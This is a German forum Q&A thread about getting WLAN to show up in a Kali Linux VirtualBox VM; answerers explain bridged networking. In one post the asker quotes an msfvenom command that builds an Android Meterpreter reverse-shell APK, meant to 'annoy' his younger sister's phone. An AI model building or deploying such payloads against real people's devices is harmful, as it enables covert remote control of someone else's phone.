Brauche ich bei Linux Kali (VirtualBox) wirklich einen Wlan-Stick?

4 Antworten

du verwendest doch das wlan sofern du die netzwerkbrücke korrekt eingerichtet hast. die vm, in dem fall interpretiert es jediglich nur als kabelgebunden.

Wieso aber wird dann mein Wlan bei dem Befehl; "ifconfig" nicht angezeigt (wlan0)?

@nicklasobrig

hab ich doch grade eben gesagt. die vm interpretiert die netzwerkbrücke als kabelgebunden auch wenn du vom hostsystem eigentlich das wlan beziehst.

soweit ich per PM mitbekommen habe geht es hier um das eigentlich offensichtliche. jemand will versuchen in fremde wlan netzwerke einzubrechen. mein support endet hiermit.

ich finde es echt ne schweinerei den ruf von kali so in den dreck zu ziehen.. ich hab die schnauze auf jedenfall gestrichen voll. zukünftig beantworte ich keine einzige frage mehr sofern 'Kali' erwähnt wird.

Nein nein, ich habe nich vor irgendeinen irsinn zu machen, wenn sowas schon behauptet wird dann sag ichs dir. Ich habe eine jüngere schwester und wollte sie einfach mal mit dem msfvenom Befehl (msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.** R>/username/Desktop/Example.apk) ein bisschen ärgern ^^. Sobald ich das geschafft habe bin ich auch durch mit Kali, aber ich kann meine IP (LHOST=192.168.**) nicht angeben weil ich sie beim; 'ifconfig' nicht habe (wlan0) und mit dem ethernet funktionierts nicht weil ich mit beiden Geräten im selben Netzwerk sein muss.

merkwürdig. eigentlich müsstet ihr im selben Netz sein. bist du sicher das du nicht versehentlich vlan verwendest (fängt oft mit 10.x an)

Hallo

Brauche ich bei Linux Kali (VirtualBox) wirklich einen Wlan-Stick?

Nein

Bei; "ifconfig" wird bei mir nur mein ethernet angezeigt (eth0) obwohl ich auch mit Wlan verbunden bin

Das ist vollkommen normal, weil es ja eine Virtualisierung ist und bei dieser werden alle LAN- & WLAN Schnittstellen des Hostsystems als Kabelgebundene eingebunden. Wenn Du die echte Hardware verwenden willst musst Du das Netzwerk anders konfigurieren.

Für jemanden der Kali verwenden will bist Du aber wirklich noch sehr sehr grün hinter den Ohren und solltest deshalb zunächst mehr über Linux-Systeme lernen, am besten mit einer "normalen" Distribution die dann auch Deinen geistigen Horizont nicht überfordert.

muss ich wirklich einen Wlan-Stick haben um Wlan zu benutzen?

Ja

Linuxhase

Woher ich das weiß:eigene Erfahrung – Ich benutze seit 2007 Linux und habe LPIC101 und LPIC102

Jaaaa endlich einer der meine frage beantwortet, ja du bist nicht der erste der mir sagt ich solle mich erst informieren, aber auch hier sage ich, ich renne einfach mal drauf los, keine lust und zeit viel drüber zu lesen blabla :P naja, jeder machts auf seine weise. Jz nochmal zur sicherheit ganz detailliert. Damit bei; "ifconfig", "wlan0" angezeigt wird brauche ich einen Wlan-Stick?

@nicklasobrig

ich renne einfach mal drauf los, keine lust und zeit viel drüber zu lesen blabla

  • Mit dieser Einstellung wirst Du kaum jemanden Finden der bereit ist Dir zu helfen; ich jedenfalls unterstütze das nicht.
  • Mit dieser Vorgehensweise wirst Du sowieso scheitern.

naja, jeder machts auf seine weise

.... und scheitert auf seine Weise.

Damit bei; "ifconfig", "wlan0" angezeigt wird brauche ich einen Wlan-Stick?

  1. ist ifconfig veraltet und sollte durch ip <parameter> ersetzt werden.
  2. W-Lan ohne W-Lan Gerät ist logischerweise nicht möglich
  3. Aber damit es innerhalb der Virtualisierung auch angezeigt wird muss es bridget eingestellt werden (das bedeutet im Prinzip zum Wirt durchgeschleift)

Linuxhase

Ja, das Internet wird sozusagen über Kabel an die virtuelle Maschine weitergeleitet. Es ist also egal ob dein PC über WLAN oder LAN verbunden ist, deine VM ist immer über Kabel angeschlossen. Du kannst aber einen USB WLAN Stick nehmen & den dann in der virtuellen Maschine nutzen

Und wenn ich ihn nutze wird auch mein Wlan (Wlan0) angezeigt?

Guck mal die letzte Antwort von mir bei @LeonardM ich kann quasi nicht mit dem ethernet den Befehl nutzen. Aber ich verstehe nicht wieso jeder sagt ich sei trotzdem mit dem Wlan verbunden, wo steht dann meine IP? Weil ich die dafür auch brauche.

Brauche ich bei Linux Kali (VirtualBox) wirklich einen Wlan-Stick?

Ne, brauchst du nicht.

Wie komme ich denn dann ins Lokale Netz?

@nicklasobrig

Natürlich kommst ins lokale Netz. Hast doch geschrieben, dass ifconfig eth0 findet.